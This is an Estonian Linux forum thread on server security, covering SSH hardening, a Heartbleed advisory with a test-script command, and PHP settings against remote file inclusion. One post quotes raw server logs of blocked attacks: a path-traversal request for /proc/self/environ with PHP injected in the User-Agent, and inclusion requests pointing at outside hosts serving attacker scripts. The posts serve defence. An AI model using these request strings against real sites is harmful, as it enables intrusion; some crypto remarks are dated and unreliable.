Autor |
Sõnum |
johnsmith
Vana Pingviin
Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD
|
|
Tsitaat: |
Ma võin nüüd mööda panna, aga kas mitte pole avaliku-salajase võtme põhise krüptograafia "muukimatus" (erinevalt ühe võtmega krüptost) matemaatiliselt tõestamata? Ja kuidas nende kvantarvutite tulek seda mõjutama pidi?
. |
Täitsa õige, me ei tea kas on mingi tagauks algoritmi näol olemas.
Ma küll usun, et me saame sellest ka teada sellega ju tegeletakse kogu aeg.
Praegu teadaolevalt tuleb siiski kasutada katse eksituse meetodit korrutades kahte algarvu omavahel ja võrreldes tulemust kräkitava avaliku võtmega.
2048 bitist avalikku võtit võib võrrelda tugevuselt 128 bitise sümeetrilise võtmega. Minu teada on murtud mingi 50 bitine sümmeetriline võti aga probleem on selles, et võti tugevneb potensis- 90bitine võti = 2 potensis 90 aga 128 bitine võti on juba 2 potensis 128.
Asümmeetrilist võtit 1024 bitti loetakse praegu veel küllalt tugevaks. Pealegi ei anna mingi krüpteering nagunii 100% kaitset. Kassakappidele antakse ju ka turvasertifikaat selle järgi kui palju ja milliseid vahendeid ja aega läks kapi lahtisaamiseks. Kassakapid läbivad testi kus lukksepad üritavad kappi lahti saada ja olenevalt sellest kui raske on kappi lahti saada võtavad lukksepad järjest karmimad riistad kasutusele kuni kapp saadakse lahti.
Avalik võti toimibki sarnaselt id kaardile, sul on midagi mida teistel pole kuigi jah avalikust võtmest on võimalik teoreetiliselt salajase võtme välja arvutada.
Peab lihtsalt ära ootama millal pea sisse implantaadina mikrokiip pannakse siis pole muud kui paned pea lugejasse ja logid sisse.
|
|
|
|
|
|
|
|
markus
Pingviini kasutaja
Vanus: 39
Liitunud: 11.08.2006
Postitused: 43
Asukoht: Tartu
Distributsioon: Gentoo
|
|
|
|
uniz
Vana Pingviin
Vanus: 45
Liitunud: 18.05.2006
Postitused: 764
Distributsioon: ubuntucare
|
|
|
|
olavsu1
Vana Pingviin
Vanus: 49
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
kuna minu enda servu pihta tehakse enamuses remote file inclusion attack'i
siis leitsin sellise koha http://www.webmasterworld.com/apache/3448091.htm
seal soovitatakse lisaks htacces falile veel php.ini fali muuta
register_globals = Off
allow_url_fopen = Off
// ise peaksin vist rahukiult hingata saama.
|
|
|
|
_________________ olen Troll ja ootan pingviin.org konto sulgemist.
|
|
|
|
JannoT
Pingviini kasutaja
Liitunud: 10.05.2008
Postitused: 63
Asukoht: Tallinn
Distributsioon: Arch
|
|
olavsu1 kirjutas: | kuna minu enda servu pihta tehakse enamuses remote file inclusion attack'i
siis leitsin sellise koha http://www.webmasterworld.com/apache/3448091.htm
seal soovitatakse lisaks htacces falile veel php.ini fali muuta
register_globals = Off
allow_url_fopen = Off
// ise peaksin vist rahukiult hingata saama. |
Sul oli register globals on? :O See on üks suurimaid turvavigasid üldse ju.
Vähemalt php 6 kaob antud valik ära. (Y) Register globals peaks ikka off olema koguaeg.
|
|
|
|
|
|
|
|
olavsu1
Vana Pingviin
Vanus: 49
Liitunud: 01.12.2006
Postitused: 923
Distributsioon: ubuntu, mandriva
|
|
Tsitaat: | Sul oli register globals on? :O See on üks suurimaid turvavigasid üldse ju. |
ei, mul oli too teine asi sees.
Kood: | srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET //index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 999 \-" "XXX<? echo \"w0000t\"; ?>XXX" ClientIP: 77.221.130.14
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET //index.php?option=com_custompages&cpage=http://www.lesovik.de/files/i?? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" ClientIP: 77.221.130.14
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET /errors.php?error=http://www.lesovik.de/files/i?? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" ClientIP: 77.221.130.14 |
peab ikka maailm haigeid täis olema .... zombistatud arvutid zombistatud serverid... korra uurisin kuhu nood CLI failikesed pandud on, täiesti süütukestesse joomla ja phpBBx baasil foorumitesse.
WOW kellegil on suudetud Linux tuuri panna. vaevalt, et linuxi kasutaja hakkaks ise põrsatempe tegema.
Kood: | 76.9.3.130 - - [25/Nov/2008:01:29:38 +0200] "GET /logi.htm/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.excelsiorfm.com.br/images/idne.txt??%0D? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" ClientIP: 76.9.3.130
76.9.3.130 - - [25/Nov/2008:01:29:38 +0200] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.excelsiorfm.com.br/images/idne.txt??%0D? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" ClientIP: 76.9.3.130
|
|
|
|
|
_________________ olen Troll ja ootan pingviin.org konto sulgemist.
|
|
|
|
pisi
Pingviini kasutaja
Liitunud: 09.07.2007
Postitused: 65
Asukoht: Eesti
Distributsioon: Debian / Darwin
|
|
Kui vähegi võimalik, lubada ainult RSA autentimine (sshd_config failis RSAAuthentication yes ja kõik muud *Authentication no). Nagistamine on siis pigem tüütu kui ohtlik, nagistamise tüütuse vastu aitab SSH pordi muutmine.
Lisaks, kui kasutajate hulk on piiratud ja nad on tehniliselt võimekamad, võib mõelda ainult ID-kaardi võtmetega ligipääsu lubamisele. See tagab selle, et kellegi nõrgalt valvatud kliendimasinast võtmed pihta pannakse.
|
|
|
|
_________________ pisi - muidumees ja maailmaparandaja
@MartinPaljak.net
|
|
|
|
laurivosandi
Moderaator
Vanus: 36
Liitunud: 08.07.2005
Postitused: 647
Asukoht: Tallinn
Distributsioon: Estobuntu, Debian
|
|
Tere,
soovitaks paigaldada inimestel:
denyhosts - a utility to help sys admins thwart ssh crackers
ehk:
sudo apt-get install denyhosts
Skaneerib ssh logisid ja paneb ründajate IP-d kohe /etc/hosts.deny faili
Lauri
|
|
|
|
|
|
|
|
obundra
Vana Pingviin
Vanus: 50
Liitunud: 04.08.2005
Postitused: 1213
Asukoht: 127.0.0.1
Distributsioon: RHEL, Solaris, Debian, Gentoo
|
|
Avastati ohtlik turvaauk OpenSSL-is, rohkem infot http://heartbleed.com
Juba on olemas ka uuendused, milles viga parandatud, laske oma pakihalduril uuendada OpenSSL 1.0.1g peale või kui see pole võimalik, siis tuleks OpenSSL ümber kompileerida suvandiga -DOPENSSL_NO_HEARTBEATS.
Haavatavust saab lihtsalt testida skripti abil, https://gist.github.com/sh1n0b1/10100394
Kood: | ./ssltest.py serverinimi -p 443 |
Haavatavad on:
OpenSSL 1.0.1 kuni 1.0.1f , OpenSSL 1.0.2-beta ja 1.0.2-beta1
Haavatavad pole:
OpenSSL 1.0.0
OpenSSL 0.9.8-beta1
E: Väike tähelepanek Debian wheezy puhul.Viga on parandatud alates versioonist openssl 1.0.1e-2+deb7u5.Kui uuendada ainult openssl pakk, siis sellest ei piisa.Eraldi tuleb uuendada ka libssl pakk, kuna uuendades ainult openssl pakki versioonile 1.0.1e-2+deb7u6, jäetakse libssl uuendamata, sest openssl 1.0.1e-2+deb7u6 sõltub libssl1.0.0>=1.0.1 ja see tingimus on täidetud.
|
|
|
|
_________________ IT teenused
Viimati muutis obundra 09.04.2014, 16:32; muudetud 1 kord
|
|
|
|
sander85
Vana Pingviin
Vanus: 39
Liitunud: 08.08.2005
Postitused: 4359
Asukoht: Tallinn (vahel ka Virtsu)
Distributsioon: Mageia, Debian, CentOS
|
|
obundra kirjutas: | Avastati ohtlik turvaauk OpenSSL-is, rohkem infot http://heartbleed.com
Juba on olemas ka uuendused, milles viga parandatud, laske oma pakihalduril uuendada OpenSSL 1.0.1g peale või kui see pole võimalik, siis tuleks OpenSSL ümber kompileerida suvandiga -DOPENSSL_NO_HEARTBEATS.
Haavatavust saab lihtsalt testida skripti abil, https://gist.github.com/sh1n0b1/10100394
Kood: | ./ssltest.py serverinimi -p 443 |
Haavatavad on:
OpenSSL 1.0.1 kuni 1.0.1f , OpenSSL 1.0.2-beta ja 1.0.2-beta1
Haavatavad pole:
OpenSSL 1.0.0
OpenSSL 0.9.8-beta1 |
Peale teekide uuendamist tuleb kindlasti ka kontrollida, et kõik vajalikud teenused (nt apache, postfix jne) saaks taaskäivitatud.
|
|
|
|
_________________
|
|
|
|
imre
Vana Pingviin
Liitunud: 16.08.2005
Postitused: 2648
Asukoht: Saku kant
Distributsioon: Ubuntu
|
|
_________________ Enne teema püstitamist kasutage OTSINGUT
Küsi targalt: Infot siit!
Kui aru ei saa, siis küsi.
|
|
|
|
rastik
Pingviini külastaja
Liitunud: 27.03.2014
Postitused: 19
Distributsioon: Trisquel Gnu/Linux
|
|
v6sa kirjutas: | Tere,
soovitaks paigaldada inimestel:
denyhosts - a utility to help sys admins thwart ssh crackers
ehk:
sudo apt-get install denyhosts
Skaneerib ssh logisid ja paneb ründajate IP-d kohe /etc/hosts.deny faili
Lauri |
Olen ka denyhosts kasutamise poolt ssh serveris, kuid sellest ei ole kasu kui krüpteeritud teenust üle võrgu pealt kuulatakse.
Parem on hoopis tulemüüri reeglites või ssh seadistusfailis lubada ainult teatud ip aadressid.
|
|
|
|
|
|
|
|
|